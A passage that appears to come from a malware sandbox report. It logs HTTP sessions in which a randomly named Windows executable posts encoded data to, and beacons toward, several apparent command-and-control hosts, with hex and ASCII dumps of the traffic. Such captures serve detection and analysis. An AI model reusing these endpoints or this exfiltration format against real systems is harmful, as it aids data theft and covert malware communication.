                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 43 64 41 44 4a 74 59 7a 4a 6b 4c 4b 32 6e 5a 38 62 57 70 4e 78 46 76 52 56 49 4d 73 33 34 36 32 76 77 73 35 65 53 76 31 63 31 62 78 6c 76 69 46 43 69 65 4d 42 77 4e 51 41 54 52 53 74 63 67 41 5a 4e 4a 47 71 65 2f 56 2b 79 4d 6b 42 34 50 6c 30 46 43 35 56 34 4c 35 4e 47 45 44 38 38 64 34 67 65 70 31 52 46 46 44 6a 53 7a 43 71 33 75 72 73 79 4e 31 65 64 59 64 64 2f 69 76 4a 4f 50 70 4d 36 46 61 71 66 7a 6c 4a 47 45 78 4d 51 55 33 5a 6f 52 66 63 73 6d 79 41 75 71 32 63 2b 50 61 43 77 66 47 6a 72 43 2b 58 4e 33 57 36 65 6a 70 45 6e 53 71 77 3d 3d
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkCdADJtYzJkLK2nZ8bWpNxFvRVIMs3462vws5eSv1c1bxlviFCieMBwNQATRStcgAZNJGqe/V+yMkB4Pl0FC5V4L5NGED88d4gep1RFFDjSzCq3ursyN1edYdd/ivJOPpM6FaqfzlJGExMQU3ZoRfcsmyAuq2c+PaCwfGjrC+XN3W6ejpEnSqw==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  19 | 192.168.2.4 | 49761 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:38.577179909 CEST | 773 | OUT | POST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 42 41 36 33 4e 34 73 34 66 53 76 30 63 31 62 2b 46 76 6e 4b 69 69 46 4d 41 4d 2f 51 46 72 52 53 74 49 67 41 63 4a 4a 46 5a 6e 70 58 75 79 43 38 78 34 4e 34 45 46 43 35 56 34 4c 35 4e 6a 72 44 36 55 64 35 55 69 70 33 7a 68 61 41 6a 53 30 53 4b 33 75 76 73 79 4a 31 65 64 2b 64 59 58 45 76 4d 4b 50 70 4e 71 46 62 37 66 77 76 4a 47 43 38 73 51 4c 37 63 45 5a 64 4d 67 6f 7a 7a 75 6d 35 66 65 6b 66 45 68 46 58 53 4b 56 73 58 70 45 4c 39 58 58 6b 48 61 62 78 78 5a 34 56 57 6d 75 63 6c 48 48 65 38 55 4c 38 61 56 59 6d 70 51 3d
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctBA63N4s4fSv0c1b+FvnKiiFMAM/QFrRStIgAcJJFZnpXuyC8x4N4EFC5V4L5NjrD6Ud5Uip3zhaAjS0SK3uvsyJ1ed+dYXEvMKPpNqFb7fwvJGC8sQL7cEZdMgozzum5fekfEhFXSKVsXpEL9XXkHabxxZ4VWmuclHHe8UL8aVYmpQ=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.4 | 49762 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:41.121562004 CEST | 10855 | OUT | POST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 43 67 36 32 2b 67 73 34 38 36 76 7a 63 31 62 33 6c 76 6d 4b 69 69 45 4d 42 6b 42 51 45 58 42 53 75 77 67 47 2b 42 4a 52 34 6e 70 65 75 79 43 67 42 34 4d 6c 30 46 62 35 56 6f 50 35 4e 54 72 44 36 55 64 35 56 79 70 2b 42 46 61 4d 44 53 7a 43 71 33 71 72 73 79 74 31 65 31 41 64 59 54 79 73 34 2b 50 77 74 61 46 59 49 33 77 6e 4a 47 41 37 73 52 65 37 63 42 48 64 4d 74 58 7a 77 7a 4a 35 59 75 6b 54 42 63 48 45 47 4f 55 35 32 39 68 52 64 79 79 6f 47 4f 32 37 47 52 39 52 6b 43 6c 65 57 36 71 51 50 35 44 70 5a 35 76 36 39 78 4b 45 49 75 71 6f 48 73 79 64 4b 6c 6f 45 53 51 4b 35 37 7a 74 57 49 51 43 76 54 51 77 4c 56 45 4b 2b 49 77 43 43 75 55 6d 38 6e 55 76 74 72 47 45 4d 55 41 74 41 6b 57 6e 45 57 43 74 71 32 44 38 73 65 50 53 4d 7a 37 4d 54 76 76 35 79 32 4b 4a 6d 75 30 4d 7a 67 53 4a 6f 30 41 5a 4c 7a 49 4d 4e 38 46 6d 38 65 67 71 43 67 39 72 34 4d 79 4a 4c [TRUNCATED]
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctCg62+gs486vzc1b3lvmKiiEMBkBQEXBSuwgG+BJR4npeuyCgB4Ml0Fb5VoP5NTrD6Ud5Vyp+BFaMDSzCq3qrsyt1e1AdYTys4+PwtaFYI3wnJGA7sRe7cBHdMtXzwzJ5YukTBcHEGOU529hRdyyoGO27GR9RkCleW6qQP5DpZ5v69xKEIuqoHsydKloESQK57ztWIQCvTQwLVEK+IwCCuUm8nUvtrGEMUAtAkWnEWCtq2D8sePSMz7MTvv5y2KJmu0MzgSJo0AZLzIMN8Fm8egqCg9r4MyJLtY7g4rY2e9AthZa1hjVn+Vu1UFdz9TbrIo4OD9ipRb6gsC3cfXslA/EX060hxIvVJsJZ3K9+rR/A9spN5m4Emhvl+w+FhMekbtas2taVeqUNrp6Hz8YhW8RqGMlKOmcN4nUBKRaesebam2D9UrXJtWZ+tOJcMPH8DaZemT4d342mrVURNYsr/aWZO8owsVgkdkhQsjLsAlUK24eJhBqtybrCv2OURoNo+2bLr3HSctL3C9tctIP8T6LTMUJOkm2GGpyyzj4HQUJMGtP64WYnnS0lsZ641k6OEDG3mJCvvu2IUSk09tjwJP0FoVn9ajSMD/7qdRY/fGA//zpMVDGRp9rS4aDGa1vZzD1rN2mLot9s5pIstMrOZqznuvlkvpIyvjRtkfbDt/ypObadNSqANO9BoLdSho/pQKb6EFsEotK8RmdMQ7gXapQwNS/IlMAq94d5omHHP1FUeR1WeHUzJRBm6TV7ckO5NYUJcdKq7jXBdt+sZrElBLM84W/RU4JrDtwStTwaGNwPWYVXgNa6oxiM4VPjZvYTLWCG7LxuQIroD7cr4xB6RHHgd2SDfrra3xP0fdzyqsvrgQW5uJw4GqTVk9L50bPvxdzrJVKuIQ8YaBb0J12eDO8Bo7wP3oHWPhkcd7JDFjuV1POrd17hF64WkEK5HJumbn [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.4 | 49763 | 116.213.43.190 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:12:43.659425020 CEST | 496 | OUT | GET /l8a4/?n02X2xPX=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:10.075815916 CEST | 768 | OUT | POST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 75 78 6b 49 55 4c 77 63 63 54 77 72 69 50 34 45 44 63 53 71 44 4f 43 61 6c 4d 62 43 79 4d 6a 35 42 45 54 73 65 4b 61 66 43 35 49 70 65 32 44 78 55 35 37 53 77 34 4b 48 53 63 4f 37 66 34 62 6b 38 76 6a 44 63 71 42 49 41 4c 48 43 4c 69 67 61 4a 39 54 55 6a 47 2f 2b 7a 31 49 4e 64 7a 64 4a 31 53 6d 6b 47 5a 79 42 46 47 50 57 37 62 55 2b 55 31 2f 78 4f 35 34 54 33 77 57 65 6e 38 6d 51 6f 6c 56 35 48 54 4b 47 42 62 4c 57 72 47 7a 50 38 41 6f 30 68 41 6c 4a 74 57 41 49 39 67 31 50 5a 76 70 41 54 62 52 71 30 73 79 66 46 36 6f 7a 59 58 39 61 67 3d 3d
                  Data Ascii: n02X2xPX=W8/dEbuYH385kuxkIULwccTwriP4EDcSqDOCalMbCyMj5BETseKafC5Ipe2DxU57Sw4KHScO7f4bk8vjDcqBIALHCLigaJ9TUjG/+z1INdzdJ1SmkGZyBFGPW7bU+U1/xO54T3wWen8mQolV5HTKGBbLWrGzP8Ao0hAlJtWAI9g1PZvpATbRq0syfF6ozYX9ag==


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:12.602462053 CEST | 788 | OUT | POST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 6f 6a 36 67 30 54 76 62 32 61 59 43 35 49 78 75 32 4b 76 6b 35 47 53 77 6b 6f 48 57 63 4f 37 66 73 62 6b 35 72 6a 43 74 71 43 4a 51 4c 46 62 62 69 69 55 70 39 54 55 6a 47 2f 2b 7a 68 79 4e 5a 6e 64 4a 47 36 6d 6c 69 46 78 4c 6c 47 4d 47 4c 62 55 30 30 31 37 78 4f 35 57 54 30 30 77 65 68 77 6d 51 74 5a 56 34 56 37 4c 50 42 62 4a 5a 4c 48 67 4a 75 77 6c 31 7a 78 49 42 63 33 37 4f 65 4d 55 44 2f 2b 7a 52 69 36 47 34 30 49 42 43 43 7a 63 2b 62 71 30 42 75 43 47 2f 4e 39 47 62 42 63 5a 67 52 52 56 49 35 59 6f 31 77 34 3d
                  Data Ascii: n02X2xPX=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAoj6g0Tvb2aYC5Ixu2Kvk5GSwkoHWcO7fsbk5rjCtqCJQLFbbiiUp9TUjG/+zhyNZndJG6mliFxLlGMGLbU0017xO5WT00wehwmQtZV4V7LPBbJZLHgJuwl1zxIBc37OeMUD/+zRi6G40IBCCzc+bq0BuCG/N9GbBcZgRRVI5Yo1w4=


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:15.132055044 CEST | 10870 | OUT | POST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 67 6a 35 53 38 54 76 38 69 61 5a 43 35 49 38 4f 32 50 76 6b 35 68 53 77 73 73 48 57 5a 7a 37 64 55 62 6c 66 58 6a 58 70 2b 43 43 51 4c 46 47 4c 69 6e 61 4a 38 54 55 6a 32 6a 2b 7a 78 79 4e 5a 6e 64 4a 41 47 6d 73 57 5a 78 59 31 47 50 57 37 62 41 2b 55 30 63 78 4f 78 67 54 31 41 47 64 52 51 6d 52 4e 70 56 37 6d 54 4c 41 42 62 48 63 4c 47 6e 4a 75 39 6c 31 7a 39 71 42 63 43 7a 4f 64 51 55 41 70 66 6f 44 79 76 59 6c 31 67 44 5a 77 62 4a 6e 38 4b 7a 46 63 72 2f 33 39 56 54 48 53 63 6e 36 52 34 4f 51 4b 34 6a 6d 57 54 56 2b 4b 59 6f 64 57 6d 61 64 51 65 6d 6a 34 77 56 63 46 56 78 6e 68 2f 6e 6f 6e 4f 55 62 34 6e 55 66 56 30 41 5a 6d 76 79 57 66 38 58 35 67 54 69 4e 79 66 5a 52 44 54 53 2b 67 33 31 61 59 4a 78 6b 53 4c 45 30 38 78 4a 53 38 72 53 65 66 75 4b 75 4b 54 2f 59 4f 54 48 7a 74 32 44 4e 31 4f 70 31 41 4a 2b 59 4e 73 30 4c 4d 5a 4a 38 52 45 6a 71 [TRUNCATED]
                  Data Ascii: n02X2xPX=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAgj5S8Tv8iaZC5I8O2Pvk5hSwssHWZz7dUblfXjXp+CCQLFGLinaJ8TUj2j+zxyNZndJAGmsWZxY1GPW7bA+U0cxOxgT1AGdRQmRNpV7mTLABbHcLGnJu9l1z9qBcCzOdQUApfoDyvYl1gDZwbJn8KzFcr/39VTHScn6R4OQK4jmWTV+KYodWmadQemj4wVcFVxnh/nonOUb4nUfV0AZmvyWf8X5gTiNyfZRDTS+g31aYJxkSLE08xJS8rSefuKuKT/YOTHzt2DN1Op1AJ+YNs0LMZJ8REjqOEkkvQg2Hax0fSF+unUN3Jya3nu0lHpccAARnQ7MzjYhxQifzmOvR+Q73v0ne5ozHhWdtWzKSTZWBIuJ1c8v7ng2F5CjhoCI4wlXQSvJ+jmcc5Xh6OBm6BLUr5B7sfOFvy6OsmuIlAYyIL4UccekEHaSu+iwG0SqZD4+OUKCeGQ2fSPIp3iqCkJIgVaDvhjQcrZYs3xOwiHtYeZj95brUZ/jg+D9ktHjQRExFjqY1RFvegEm9ezZqrvVGSU/k0wDNErZzTo53K/UWRzXFCjMfXXq3VTI1+/xFZbcU+vRgsK2I8ty9eAR0thSyzxwCV4Jz0yXf08FDjf5nOb0rbdCJweoe9fRZC78L5Hpxiy6q518Fgvha4e/ZOHWqSMDHEWKnxfOOCpwBYG/44tVdwafk9I2KWzzHT+w318UQKwzTTOT7Gyph5VY5ySsLjIr4DpsDYx3R9n04ua4gFPOcH4kWbL9uNJyVk4etqK8WU7S7M0eMCCwydQM158WMS0YhVMNqwHXBSX4CXNxce67oH8Ff9n1ii5YQscfZ0R8hyoqk6F/7IU5rQUzwNqSoeeEodhXpNhua6Np5sfScBESiIf4guh8EtCcCjC0V0WtX9esIk7evgCleOIkn36CduAyhafoWc5klJdWQNPBkzpG1BUtCXOeyrAbvgNmE2 [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  25 | 192.168.2.4 | 49767 | 13.248.169.48 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:17.664186954 CEST | 501 | OUT | GET /cns4/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:18.146694899 CEST | 405 | IN | HTTP/1.1 200 OK
                  Server: openresty
                  Date: Thu, 04 Jul 2024 01:13:18 GMT
                  Content-Type: text/html
                  Content-Length: 265
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 48 55 50 65 3d 55 64 33 54 5a 48 41 30 2d 46 37 34 5a 5a 26 6e 30 32 58 32 78 50 58 3d 62 2b 58 39 48 73 79 64 58 32 45 5a 68 6f 46 62 48 57 44 47 57 4c 6e 38 71 53 44 6a 4a 69 42 76 67 67 32 46 56 68 63 4c 41 42 6b 68 7a 7a 73 30 75 63 6d 42 50 44 4d 52 71 74 4b 65 33 58 55 4d 46 44 77 35 46 53 39 4a 69 39 49 6d 6b 63 62 34 4d 2b 53 67 56 31 43 72 4c 49 4b 57 54 38 52 2f 4c 43 32 65 2b 41 6c 4a 45 62 2f 68 48 77 4f 33 75 47 4e 53 4a 45 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs="}</script></head></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  26 | 192.168.2.4 | 49768 | 38.47.232.224 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:23.294795990 CEST | 744 | OUT | POST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 7a 33 47 33 52 31 55 31 48 38 35 74 41 2b 78 54 58 68 2b 7a 2b 71 56 51 71 73 6f 4e 33 53 36 72 41 48 48 2f 56 69 4c 6c 59 49 4d 35 4b 35 2b 35 4f 4d 39 2b 4b 56 2b 44 71 73 6a 72 70 69 7a 56 58 44 36 77 35 53 70 52 59 51 67 73 38 54 53 76 42 2b 47 46 35 49 78 6c 6e 5a 6a 64 58 74 4a 62 2f 43 37 5a 2b 63 62 41 39 62 2b 7a 69 6c 76 64 62 6c 41 43 4f 6a 56 6b 4f 32 51 79 46 6a 36 67 4c 32 4b 69 2f 66 35 63 46 62 55 54 47 4f 75 72 67 75 52 78 47 73 6e 44 59 69 78 48 54 54 37 64 4f 32 70 42 36 52 33 71 42 4a 53 53 47 53 48 4e 64 49 34 47 48 77 3d 3d
                  Data Ascii: n02X2xPX=ZfgZOZYDN/qEz3G3R1U1H85tA+xTXh+z+qVQqsoN3S6rAHH/ViLlYIM5K5+5OM9+KV+DqsjrpizVXD6w5SpRYQgs8TSvB+GF5IxlnZjdXtJb/C7Z+cbA9b+zilvdblACOjVkO2QyFj6gL2Ki/f5cFbUTGOurguRxGsnDYixHTT7dO2pB6R3qBJSSGSHNdI4GHw==
                  Jul 4, 2024 03:13:24.179734945 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:24 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  27 | 192.168.2.4 | 49769 | 38.47.232.224 | 80 | 2844 | C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 4, 2024 03:13:25.838396072 CEST | 764 | OUT | POST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 65 72 41 6e 33 2f 45 57 66 6c 4e 49 4d 35 65 70 2b 6c 41 73 39 68 4b 56 43 4c 71 75 48 72 70 69 58 56 58 42 69 77 35 6a 70 53 59 41 67 71 33 7a 53 74 4d 65 47 46 35 49 78 6c 6e 5a 6e 37 58 73 68 62 2b 33 7a 5a 76 4e 62 42 68 4c 2b 38 68 6c 76 64 4d 31 41 47 4f 6a 56 61 4f 79 59 4d 46 6e 4b 67 4c 33 57 69 2f 4e 42 64 65 4c 56 57 49 75 76 69 68 38 6b 56 4f 75 69 32 61 46 5a 72 65 54 72 51 4c 77 34 62 72 67 57 39 54 4a 32 68 62 56 4f 35 51 4c 46 50 63 38 45 38 43 69 61 75 4e 70 49 32 2b 41 39 4b 2b 55 48 44 36 63 30 3d
